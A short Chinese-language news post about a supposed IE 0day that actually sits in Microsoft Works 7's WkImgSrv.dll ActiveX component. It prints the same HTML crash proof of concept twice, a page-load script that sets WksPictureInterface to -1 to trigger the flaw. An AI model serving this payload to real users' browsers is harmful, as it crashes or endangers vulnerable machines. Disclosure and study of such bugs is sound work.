IE 0day漏洞 问题出自MS Works
人气:0
近几天网络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Microsoft Works)。
影响的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0) 以下为crash POC <html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>
影响的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0) 以下为crash POC <html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>
加载全部内容